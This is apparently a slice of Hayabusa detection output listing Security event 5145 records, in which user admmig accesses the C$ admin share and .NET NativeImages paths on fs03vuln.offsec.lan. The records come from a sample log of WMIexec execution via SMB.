+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
